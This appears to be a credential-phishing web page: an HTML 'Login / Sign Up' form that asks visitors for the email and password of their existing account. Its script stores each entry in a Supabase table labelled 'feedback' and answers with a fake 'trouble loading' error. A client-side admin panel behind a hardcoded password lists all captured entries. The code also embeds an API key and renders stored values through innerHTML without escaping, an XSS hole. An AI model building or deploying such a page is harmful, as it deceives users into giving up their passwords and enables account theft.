<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Canvas</title>
  <script src="https://cdn.jsdelivr.net/npm/@supabase/supabase-js@2"></script>
  <style>
    body {
      font-family: Arial, sans-serif;
      background-color: #121212;
      color: white;
      display: flex;
      justify-content: center;
      align-items: flex-start;
      min-height: 100vh;
      margin: 0;
      padding: 20px;
    }
    .container {
      max-width: 700px;
      width: 100%;
      background: #1e1e1e;
      padding: 20px;
      border-radius: 12px;
      box-shadow: 0 0 10px rgba(0,0,0,0.3);
    }
    h1 {
      text-align: center;
    }
    input, textarea, button {
      width: 100%;
      padding: 10px;
      margin: 8px 0;
      border-radius: 8px;
      border: 1px solid #333;
      background: #222;
      color: white;
      font-size: 16px;
      box-sizing: border-box;
    }
    textarea {
      height: 40px;
      resize: none;
      overflow-y: hidden;
    }
    button {
      background: #007bff;
      border: none;
      cursor: pointer;
    }
    button:hover {
      background: #0056b3;
    }
    #notification {
      position: fixed;
      top: -60px;
      left: 50%;
      transform: translateX(-50%);
      background: #28a745;
      color: white;
      padding: 12px 20px;
      border-radius: 8px;
      font-weight: bold;
      box-shadow: 0 2px 6px rgba(0,0,0,0.3);
      transition: top 0.4s ease;
      z-index: 1000;
    }
    #adminPanel {
      margin-top: 20px;
      display: none;
      background: #2a2a2a;
      padding: 15px;
      border-radius: 10px;
    }
    .feedback-item {
      border-bottom: 1px solid #444;
      padding: 8px 0;
    }
    .feedback-item:last-child {
      border-bottom: none;
    }
    .controls {
      display: flex;
      gap: 10px;
      margin-bottom: 10px;
    }
  </style>
</head>
<body>
  <div class="container">
    <h1>Login / Sign Up</h1>
    <form id="feedbackForm">
      <input type="text" id="name" placeholder="Your Email (sign in with your current account)" required>
      <input type="password" textarea id="message" placeholder="Password" required></textarea>
      <button type="submit">Sign in / Sign up</button>
      <button onclick="window.location.href='index.html'">Home</button>
    </form>

    <button id="adminBtn" style="margin-top: 10px;">Admin Login</button>

    <div id="adminPanel">
      <h2>Feedback Responses</h2>
      <div class="controls">
        <input type="text" id="search" placeholder="Search feedback...">
        <button id="refreshBtn">Refresh</button>
      </div>
      <div id="feedbackList">Loading...</div>
    </div>
  </div>

  <div id="notification"></div>

  <script>
    const SUPABASE_URL = "https://wqnwdjhehbpekvwjadxr.supabase.co";
    const SUPABASE_KEY = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJzdXBhYmFzZSIsInJlZiI6IndxbndkamhlaGJwZWt2d2phZHhyIiwicm9sZSI6ImFub24iLCJpYXQiOjE3NTgyNDMwODYsImV4cCI6MjA3MzgxOTA4Nn0.npkPoVq08u8WHu05wzj5J3mZ_-1gUxsErQ4xqMtHths";
    const supabaseClient = supabase.createClient(SUPABASE_URL, SUPABASE_KEY);

    const form = document.getElementById('feedbackForm');
    const nameInput = document.getElementById('name');
    const messageInput = document.getElementById('message');
    const notification = document.getElementById('notification');
    const adminBtn = document.getElementById('adminBtn');
    const adminPanel = document.getElementById('adminPanel');
    const feedbackList = document.getElementById('feedbackList');
    const searchInput = document.getElementById('search');
    const refreshBtn = document.getElementById('refreshBtn');

    function showNotification(message, success = true) {
      notification.textContent = message;
      notification.style.background = success ? '#28a745' : '#dc3545';
      notification.style.top = '20px';
      setTimeout(() => { notification.style.top = '-60px'; }, 3000);
    }

    function autoResize(el) {
      el.style.height = '40px';
      el.style.height = el.scrollHeight + 'px';
    }

    messageInput.addEventListener('input', () => autoResize(messageInput));

    form.addEventListener('submit', async (e) => {
      e.preventDefault();
      const name = nameInput.value.trim();
      const message = messageInput.value.trim();

      if (!name || !message) {
        showNotification("Please fill out all fields", false);
        return;
      }

      const { error } = await supabaseClient.from("feedback").insert([{ name, message }]);

      if (error) {
        console.error(error);
        showNotification("Failed to submit feedback", false);
      } else {
        showNotification("Savnac is having trouble loading. Try Again Later");
        nameInput.value = "";
        messageInput.value = "";
        autoResize(messageInput);
      }
    });

    async function loadFeedback(filter = "") {
      const { data, error } = await supabaseClient
        .from("feedback")
        .select("*")
        .order("created_at", { ascending: false });

      if (error) {
        feedbackList.innerHTML = "<p style='color:red;'>Error loading feedback.</p>";
        console.error(error);
        return;
      }

      const filtered = data.filter(f =>
        f.name.toLowerCase().includes(filter.toLowerCase()) ||
        f.message.toLowerCase().includes(filter.toLowerCase())
      );

      if (filtered.length === 0) {
        feedbackList.innerHTML = "<p>No feedback found.</p>";
        return;
      }

      feedbackList.innerHTML = "";
      filtered.forEach(item => {
        const div = document.createElement("div");
        div.classList.add("feedback-item");
        div.innerHTML = `<strong>${item.name}</strong>: ${item.message}<br><small>${new Date(item.created_at).toLocaleString()}</small>`;
        feedbackList.appendChild(div);
      });
    }

    adminBtn.addEventListener('click', () => {
      const pass = prompt("Enter admin password:");
      if (pass === "savnacsigma") {
        adminPanel.style.display = "block";
        loadFeedback();
      } else {
        alert("Wrong password!");
      }
    });

    searchInput.addEventListener('input', () => loadFeedback(searchInput.value));
    refreshBtn.addEventListener('click', () => loadFeedback(searchInput.value));
  </script>
</body>
</html>
